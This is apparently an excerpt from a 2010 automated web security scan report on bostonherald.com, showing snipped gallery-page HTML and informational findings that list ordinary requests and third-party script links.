<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Marco Sturm nets stylish choices"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Marco Sturm nets stylish choices">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4455','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/8d568a_101910celticsmw13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4452','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/48999a_101810bruinstf05.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Bruins pratice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Bruins pratice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4449','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/0d59ee_101710pats18.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4445','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101016/stp/9cc789_100810patsjw03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots - Saturday"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots - Saturday">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4443','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/367211_101510footballce004.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4441','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/06df0b_101410patriotsmw13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4439','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/795c9a_101310patriotstf03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4438','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/2787ca_101310bruinspw011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4436','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101013/stp/aaa6c0_101210patsnl17.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4433','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/ff8eaf_101110celticstf14.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics practice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics practice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4431','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101011/stp/f691f9_101010celticsmw14.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4424','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/21a47b_100910harvardjw07.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4423','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/ac1815_100810patsjw12.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4419','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/d450af_100710patsjw19.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4415','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/d2c5b9_100610celticsms01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4407','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/6a578c_100510celtsar05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4404','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/a8f666_100410patriotsmw43.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 41, Dolphin 14"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 41, Dolphin 14">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4397','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/717bd4_100310redsoxkm27.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4396','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/d72784_100210bcfootballjw08.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC football"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC football">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4494','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/8193a3_103110florencekm08.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4460','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/aa4488_21ghos4.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4459','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/4ad8be_101810tiffanytf04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Tiffany's new handbag line"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Tiffany's new handbag line">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4435','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/b78c53_Premiere_Hereafter_NY__trose@heraldinteractive.com_7.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4421','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/2d0b15_100910lauf12.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4417','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/46aee4_100610hous04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4410','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101006/stp/aa92d8_pold.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4495','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14ed81_110410shaq01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4479','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/192b5f_2010102720101027209632.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Celebs at the Garden for the Celtics-Heat game"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Celebs at the Garden for the Celtics-Heat game">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4462','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101021/stp/c30001_73072_1533486631381_1661255220_1332182_5774520_n.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Shaq strikes a pose in Harvard Square"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Shaq strikes a pose in Harvard Square">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4399','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101004/stp/cabf78_Dempsey_Challenge__trose@heraldinteractive.com_3.jpg" alt="Photo" /></a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20101107/17ad46_110610cahillfn03.JPG" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=17ad46_110610cahillfn03" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/news/us_politics/view.bg?articleid=1294859"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/cb73f7_lisam11082010.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

8.15. http://bostonherald.com/mediacenter/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:22:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2632
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

8.16. http://bostonherald.com/mediacenter/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding limo highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:28:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2571
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/_p.js"></script>
...[SNIP]...

8.17. http://bostonherald.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 101122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
